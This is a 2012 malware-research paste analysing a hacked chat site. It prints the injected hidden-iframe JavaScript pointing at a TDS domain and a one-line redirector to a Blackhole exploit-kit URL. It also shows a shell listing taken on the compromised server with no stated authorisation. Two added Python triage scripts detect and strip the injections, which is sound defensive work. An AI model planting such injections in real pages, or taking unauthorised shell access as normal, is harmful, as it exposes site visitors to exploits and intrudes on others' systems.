MalwareMustDie

#MMD!! irc.muhabbetturk.net loaded with TDS Infector + BHEK2

Nov 9th, 2012
=================================
#MalwareMustDie!!
31.210.155.181 / http://irc.muhabbetturk.net/
loaded with infectors
Case 1 = 4 files (TDS Malware Infector)
http://fohfynly.ru/count2.php
Case 2 = 1 file (BHEK 2 js.js redirector to PluginDetect)
http://q.e-tecinnovation.co.uk/links/created_danger.php

#Hint from Hulk_crusader for case 2
Case 1 dug up by @unixfreaxjp
Sat Nov 10 01:13:44 JST 2012

!! IMPORTANT!!
Currently a major infection of case 1 is ITW (in the wild)!!!
PoC:

// checking how far the infection has spread....

DORK THIS ===> " 'src = 'http://fohfynly.ru/count2.php"

About 11,700 results (0.30 seconds) ↓↓

Online Test of Usul-e-Fiqh-1
www.qoitrat.org/test/Usul-e-Fiqh-1/default.asp - Cached
(function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
Online Test of Shrh-e-Luma-2
www.qoitrat.org/test/Shrh-e-Luma-2/default.asp - Cached
(function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
SR Presentation Folders - Top Class Signs and Printing
www.topclassprinting.com/...php/.../SR-Presentation-Folders.html?...
This site may harm your computer.
createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; ...
Signs and Printing | Forgot your Username?
www.topclassprinting.com/index.php/Lost-user-name.html
This site may harm your computer.
(function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
H2Solution
www.h2-solution.com/index.asp?action=team - Cached
(function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...
Feedback - Gitarattan International Business School
gitarattan.edu.in/feedback.php - Cached
Feedback Form <script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; ...
Ferrari San Antonio, New and Pre-owned Ferrari and Maserati ...
https://heroesandfantasies.com/ - Cached
(function() { var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; ...

1 2 3 4 5 6 7 8 9 10 Next



==================================

<<<<<<<<<<<< P o C >>>>>>>>>>>>

//hint

See http://irc.muhabbetturk.net/

------------------------

//making it short, got the shell.....

$ ls -alF
total 532
drwxr-xr-x 8 xxxxx xxxxx 1024 Nov 10 00:17 ./
drwxrwxrwx 6 xxxxx xxxxx 512 Nov 10 00:17 ../
drwxr-xr-x 3 xxxxx xxxxx 512 Nov 10 00:17 _autoindex/
-rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 cnt.php*
-rwxr--r-- 1 xxxxx xxxxx 0 Nov 10 00:11 count.php*
-rwxr--r-- 1 xxxxx xxxxx 2550 Nov 3 01:08 dagitim.html*
-rwxr--r-- 1 xxxxx xxxxx 105043 Aug 18 2011 flaxchat.cab*
-rwxr--r-- 1 xxxxx xxxxx 169843 May 25 03:30 flaxchat.jar*
drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 images/
drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 nrJDKNYN/
-rwxr--r-- 1 xxxxx xxxxx 2011 Nov 10 00:10 oyun.html*
drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 photos/
-rwxr--r-- 1 xxxxx xxxxx 3268 Nov 3 01:08 postinfo.html*
-rwxr--r-- 1 xxxxx xxxxx 633 Aug 18 2011 setting.txt*
drwxr-xr-x 7 xxxxx xxxxx 512 Nov 10 00:17 skins/
-rwxr--r-- 1 xxxxx xxxxx 2524 Nov 3 01:08 sohbet.html*
drwxr-xr-x 2 xxxxx xxxxx 512 Nov 10 00:17 sounds/
-rwxr--r-- 1 xxxxx xxxxx 997 Nov 3 01:08 titresim.js*
-rwxr--r-- 1 xxxxx xxxxx 170138 Aug 18 2011 xxflaxchat.jar*

---------------------------------------

//scp flush'em out for plastic surgery...
:
--00:13:41-- http://irc.muhabbetturk.net/skins/mirc/?NA
=> `irc.muhabbetturk.net/skins/mirc/index.html@NA'
Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,573 (2.5K) [text/html]

--00:13:42-- http://irc.muhabbetturk.net/skins/mirc/?MD
=> `irc.muhabbetturk.net/skins/mirc/index.html@MD'
Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,573 (2.5K) [text/html]

--00:13:43-- http://irc.muhabbetturk.net/skins/mirc/?SD
=> `irc.muhabbetturk.net/skins/mirc/index.html@SD'
Connecting to irc.muhabbetturk.net|31.210.155.181|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,573 (2.5K) [text/html]
:

===========================
// infector files...

1) Infectors to the TDS Malware CNC
domains http://fohfynly.ru/count2.php
URL: http://fohfynly.ru/count2.php

===========================


=================================================
$ cat /dagitim.html (TDS Malware Infection scheme...)
=================================================
<script language="JavaScript1.2">
function shake(n) {
if (parent.moveBy) {
for (i = 10; i > 0; i--) {
for (j = n; j > 0; j--) {
parent.moveBy(0,i);
parent.moveBy(i,0);
parent.moveBy(0,-i);
parent.moveBy(-i,0);
}
}
}
}
</script>
<applet name="Flaxchat" code="flaxchat.FlaxChat.class"
archive ="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar"
width ="100%"
height ="400"
codebase = "http://irc.muhabbetturk.net">
<param name="CABBASE" value="flaxchat.cab">
<param name="ident" value="flaxchat">
<param name="fullname" value="Flaxchat">
<param name="nickname" value="">
<param name="Channel1" value="#sohbet,#oyun">
<p>Java uygulaması kurulu değil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script type="text/javascript" language="javascript" >
:
blah...

// (the Turkish fallback text reads "Java application is not installed. To install Java: chat applet";
//  the injected code starts right after it, at the <!--d1752c--> marker comment)
---------------------------------------------

//simulate....

[2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Status: 200, Referrer: None)
[2012-11-10 00:14:14] [HTTP] URL: http://irc.muhabbetturk.net/dagitim.html (Content-type: text/html, MD5: 12154dbf36908011e17fcbd7a93b007b)
[2012-11-10 00:14:17] <applet archive="flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar" code="flaxchat.FlaxChat.class" codebase="http://irc.muhabbetturk.net" height="400" name="Flaxchat" width="100%">
<param name="CABBASE" value="flaxchat.cab"></param>
<param name="ident" value="flaxchat"></param>
<param name="fullname" value="Flaxchat"></param>
<param name="nickname" value=""></param>
<param name="Channel1" value="#sohbet,#oyun"></param>
<p>Java uygulaması kurulu değil.Java yuklemek icin <a href="http://www.flaxchat.com/?getjava">chat applet</a></p><!--d1752c--><script language="javascript" type="text/javascript"> (function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('&lt;div id=\'mira\'&gt;&lt;/div&gt;'); document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->

</applet>
[2012-11-10 00:14:17] [Navigator URL Translation] flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar --> http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
[2012-11-10 00:14:18] [HTTP] URL: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar (Status: 404, Referrer: http://irc.muhabbetturk.net/dagitim.html)
[2012-11-10 00:14:18] FileNotFoundError: http://irc.muhabbetturk.net/flaxchat.jar,flaxchess.jar,flaxdraw.jar,flaxflota.jar,flaxttt.jar,flaxgammon.jar
[2012-11-10 00:14:18] Unhandled script language: javascript1.2
[2012-11-10 00:14:18] <param name="CABBASE" value="flaxchat.cab"></param>
[2012-11-10 00:14:18] <param name="ident" value="flaxchat"></param>
[2012-11-10 00:14:18] <param name="fullname" value="Flaxchat"></param>
[2012-11-10 00:14:18] <param name="nickname" value=""></param>
[2012-11-10 00:14:18] <param name="Channel1" value="#sohbet,#oyun"></param>
[2012-11-10 00:14:33] <iframe src="http://fohfynly.ru/count2.php"></iframe> <=============BINGO!!!!!!!!!!!!!!!
[2012-11-10 00:14:33] [iframe redirection] http://irc.muhabbetturk.net/dagitim.html -> http://fohfynly.ru/count2.php <=============BINGO!!!!!!!!!!!!!!!

---------------------------------------------

// Infection #1 found : http://fohfynly.ru/count2.php
// checking....

--00:25:05-- http://fohfynly.ru/count2.php
=> `./sample'
Resolving fohfynly.ru... failed: Unknown host.

//reference #1....

http://urlquery.net/report.php?id=91654
URL http://fohfynly.ru/count2.php
IP 78.96.77.179
ASN AS6830 UPC Broadband Holding B.V.
Location [Romania] Romania
Report completed 2012-11-05 16:41:59 CET
Status Report complete.
urlQuery Alerts Detected a TDS URL pattern

//http requests....

GET /count2.php HTTP/1.1 HTTP/1.1 302
Host: fohfynly.ru HTTP/1.1 302

GET /billing.php HTTP/1.1 HTTP/1.1 200 OK
Host: na-igre.pp.ua Content-Type: text/html

GET /ga.js HTTP/1.1 HTTP/1.1 200 OK
Host: www.google-analytics.com Content-Type: text/javascript

GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=885136485&utmhn=na-igre.pp.ua&utmcs=ISO-8859-1&utmsr=1176x885&utmvp=1176x761&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmhid=2033196436&utmr=-&utmp=%2Fbilling.php&utmac=UA-7382389-46&utmcc=__utma%3D119089686.1353519843.1352130089.1352130089.1352130089.1%3B%2B__utmz%3D119089686.1352130089.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1 HTTP/1.1 200 OK
Host: www.google-analytics.com Content-Type: image/gif

GET /favicon.ico HTTP/1.1 HTTP/1.1 302 Found
Host: na-igre.pp.ua Content-Type: text/html; charset=iso-8859-1

GET /error404/ HTTP/1.1 HTTP/1.1 200 OK
Host: www.host1free.com Content-Type: text/html; charset=UTF-8 // currently unregistered domain....

// count2.php answers with a 302 and hands the visitor over to billing.php on na-igre.pp.ua: that hop is the TDS at work.

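The request list above is the whole point of a TDS: the entry URL never serves content itself, it answers 302 and sends the visitor to a landing page on another host. The script below is an added example (not part of the original paste and not MalwareMustDie tooling) that parses a urlQuery-style request log of exactly the shape shown above into (host, path, status) triples, splits the stream into redirect chains, and reports the first cross-host 3xx hop. The log it runs on is constructed from the requests listed above; the set of benign third-party hosts is an assumption, and the chain logic assumes the capture lists requests in the order the browser issued them.

```python
"""Rebuild redirect chains from a urlQuery-style request log.

Each request is two lines: the request line with the response status fused
on the same row, then the Host header (with Content-Type fused on its row).
"""
import re

# Constructed sample, modelled on the captured session (not a live fetch).
SAMPLE_LOG = """\
GET /count2.php HTTP/1.1 HTTP/1.1 302
Host: fohfynly.ru HTTP/1.1 302

GET /billing.php HTTP/1.1 HTTP/1.1 200 OK
Host: na-igre.pp.ua Content-Type: text/html

GET /ga.js HTTP/1.1 HTTP/1.1 200 OK
Host: www.google-analytics.com Content-Type: text/javascript

GET /favicon.ico HTTP/1.1 HTTP/1.1 302 Found
Host: na-igre.pp.ua Content-Type: text/html; charset=iso-8859-1

GET /error404/ HTTP/1.1 HTTP/1.1 200 OK
Host: www.host1free.com Content-Type: text/html; charset=UTF-8
"""

REQ = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]\s+HTTP/1\.[01]\s+(\d{3})")
HOST = re.compile(r"^Host:\s+(\S+)")

# Assumption: third-party beacons a landing page pulls in; they are not hops.
BENIGN = {"www.google-analytics.com", "ssl.google-analytics.com"}


def parse_requests(log):
    """Return [(host, path, status)] in capture order."""
    out, pending = [], None
    for line in log.splitlines():
        m = REQ.match(line)
        if m:
            pending = (m.group(2), int(m.group(3)))
            continue
        h = HOST.match(line)
        if h and pending:
            out.append((h.group(1), pending[0], pending[1]))
            pending = None
    return out


def redirect_chains(requests):
    """Split the stream into chains: a run of 3xx hops ending at the first non-3xx.

    Assumes the browser followed each redirect before issuing anything else.
    """
    chains, cur = [], []
    for host, path, status in requests:
        if host in BENIGN:
            continue
        cur.append(f"http://{host}{path}")
        if not 300 <= status < 400:
            chains.append(cur)
            cur = []
    if cur:  # capture ended while still being redirected
        chains.append(cur)
    return chains


def tds_hop(requests):
    """First cross-host 3xx as (from_host, to_host), or None if there is none."""
    hops = [r for r in requests if r[0] not in BENIGN]
    for a, b in zip(hops, hops[1:]):
        if 300 <= a[2] < 400 and a[0] != b[0]:
            return (a[0], b[0])
    return None


if __name__ == "__main__":
    reqs = parse_requests(SAMPLE_LOG)
    for chain in redirect_chains(reqs):
        print(" -> ".join(chain))
    print("TDS hop:", tds_hop(reqs))
```

The second chain that falls out (favicon.ico on na-igre.pp.ua redirecting to the host1free.com 404 page) is what tells you the landing page sat on free hosting, which is the same thing the elinks snapshot further down shows by hand.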

//elinks snaps...

# Error 404 - Page Not Found (p1 of 4) // currently unregistered domain....
# Host1Free Banners Free Hosting
host1free.com
Sign-Up For Free Web Hosting! Login to Control Panel
Free Web Hosting is Powered by HOST1PLUS
* Free Hosting
* Features
* Affiliates
* Forum / Support
* Blog
* Upgrades
* Free VPS
VPS Hosting
Web Hosting

//reference #2

URL http://fohfynly.ru/count2.php
IP 189.214.146.232
ASN AS28554 Cablemas Telecomunicaciones SA de CV
Location [Mexico] Mexico
Report completed 2012-11-02 20:33:26 CET
Status Report complete.
urlQuery Alerts Detected a TDS URL pattern

// whois check...fohfynly.ru....

domain: FOHFYNLY.RU
nserver: ns1.systeat.com.
nserver: ns2.systeat.com.
nserver: ns3.systeat.com.
nserver: ns4.systeat.com.
nserver: ns5.systeat.com.
nserver: ns6.systeat.com.
state: REGISTERED, NOT DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: http://www.webdrive.ru/webmail/
created: 2012.11.01
paid-till: 2013.11.01
free-date: 2013.12.02
source: TCI

Last updated on 2012.11.09 19:41:38 MSK <============== JUST CHANGED

// NOT DELEGATED is why the fetch above failed to resolve. The iframes are still sitting in the
// infected pages, so they fire again the moment the domain gets its delegation back.



=================================================
$ cat /postinfo.html ; cat /sohbet.html ; cat /titresim.js
(TDS Malware Infectors...)
=================================================
:
<!--d1752c--><script type="text/javascript" language="javascript" > (function(){ var a = document.createElement('iframe');
a.src = 'http://fohfynly.ru/count2.php'; <=================================#w000t!!! Bingo!!
a.style.position = 'absolute';
a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px';
a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>');
document.getElementById('mira').appendChild(a); }})();</script><!--/d1752c-->
:
/*d1752c*/
(function(){ var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php'; a.style.position = 'absolute'; a.style.border = '0';
a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px';
if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();
/*/d1752c*/


=================================================
// infector files...
2) BHEK2 js.js Infector...

See nrJDKNYN folder of: http://irc.muhabbetturk.net/
$ cat /nrJDKNYN/js.js
=================================================

document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';

//accessing... with or without you....NO! tor...

--01:09:02-- http://q.e-tecinnovation.co.uk/links/created_danger.php
=> `./sample'
Resolving q.e-tecinnovation.co.uk... failed: Unknown host.

//reference... as expected, BHEK2.......
URL http://q.e-tecinnovation.co.uk/links/created_danger.php
IP 74.91.118.239
ASN AS12182 Internap Network Services Corporation
Location [United States] United States
Report completed 2012-11-06 16:28:30 CET
Status Report complete.
urlQuery Alerts Detected BlackHole v2.0 exploit kit URL pattern

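Both infectors on this host leave a footprint you can grep for: the TDS injection is a marker-delimited block (<!--d1752c--> ... <!--/d1752c--> in the HTML files, /*d1752c*/ ... /*/d1752c*/ in titresim.js) that builds a 2px iframe, and the BHEK2 hop is a one-line document.location assignment in nrJDKNYN/js.js. The script below is an added example, not from the original paste and not MalwareMustDie's own tooling: it finds both patterns in a webroot, pulls out the iframe and redirect targets, and returns a cleaned copy of a file with the injected block cut out. The marker regex accepts any 6-hex-character id rather than only d1752c, which is an assumption about how the injector names its markers; the sample inputs are constructed from the captured files above and the 11,700 dork hits.

```python
"""Triage helper for the hidden-iframe injection and js.js redirector seen here.

Finds the marker-delimited script blocks, extracts the iframe target, reports
one-line document.location redirectors, and returns a cleaned copy of a file.
"""
import re
import sys
from pathlib import Path

# Marker pair used on this host is d1752c; any 6-hex id is accepted (assumption)
# so a re-infection with a fresh id is still caught.
HTML_BLOCK = re.compile(r"<!--([0-9a-f]{6})-->(.*?)<!--/\1-->", re.S)
JS_BLOCK = re.compile(r"/\*([0-9a-f]{6})\*/(.*?)/\*/\1\*/", re.S)
# The payload builds an iframe and assigns its src from a string literal.
IFRAME_SRC = re.compile(
    r"createElement\(\s*['\"]iframe['\"]\s*\).*?\.src\s*=\s*['\"]([^'\"]+)['\"]", re.S)
# The BHEK2 hop in nrJDKNYN/js.js is a bare location assignment on its own line.
REDIRECTOR = re.compile(
    r"^\s*(?:document|window)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]\s*;?\s*$", re.M)


def find_injections(text):
    """Return [(marker_id, iframe_src)] for every injected block in text."""
    hits = []
    for pat in (HTML_BLOCK, JS_BLOCK):
        for m in pat.finditer(text):
            src = IFRAME_SRC.search(m.group(2))
            hits.append((m.group(1), src.group(1) if src else None))
    return hits


def strip_injections(text):
    """Remove the marker-delimited blocks, markers included."""
    return JS_BLOCK.sub("", HTML_BLOCK.sub("", text))


def find_redirectors(text):
    """Return the targets of bare document.location / window.location assignments."""
    return REDIRECTOR.findall(text)


def triage_tree(root):
    """Walk a webroot; yield (path, kind, value) for each finding."""
    for p in Path(root).rglob("*"):
        if p.suffix.lower() not in (".html", ".htm", ".php", ".js", ".asp"):
            continue
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue
        for marker, src in find_injections(text):
            yield (str(p), "iframe-injection", f"{marker} -> {src}")
        for target in find_redirectors(text):
            yield (str(p), "redirector", target)


# Constructed samples modelled on the captured files (not the real files).
SAMPLE_HTML = ("<p>chat applet</p><!--d1752c--><script type=\"text/javascript\"> (function(){"
               " var a = document.createElement('iframe'); a.src = 'http://fohfynly.ru/count2.php';"
               " a.style.height = '2px'; a.style.width = '2px'; if(!document.getElementById('mira'))"
               " { document.write('<div id=\\'mira\\'></div>'); document.getElementById('mira').appendChild(a); }})();"
               "</script><!--/d1752c-->\n</applet>\n")
SAMPLE_JS = ("/*d1752c*/\n(function(){ var a = document.createElement('iframe');"
             " a.src = 'http://fohfynly.ru/count2.php'; })();\n/*/d1752c*/\nfunction shake(){}\n")
SAMPLE_REDIRECT = "document.location='http://q.e-tecinnovation.co.uk/links/created_danger.php';\n"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, kind, value in triage_tree(sys.argv[1]):
            print(f"{kind:17} {path}  {value}")
    else:
        for name, sample in (("html", SAMPLE_HTML), ("js", SAMPLE_JS), ("js.js", SAMPLE_REDIRECT)):
            print(name, find_injections(sample), find_redirectors(sample))
```

Saved as, say, triage.py and run with the webroot as its only argument it lists every hit; with no argument it runs against the constructed samples. Cutting the block out is plastic surgery, not a fix: the 0-byte cnt.php/count.php and the random nrJDKNYN directory in the listing above show the attacker had write access to the docroot, so restore from a known-good copy and close the hole they came in through.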
====================
#MalwareMustDie!
Sat Nov 10 01:13:44 JST 2012
*) This is a team work effort!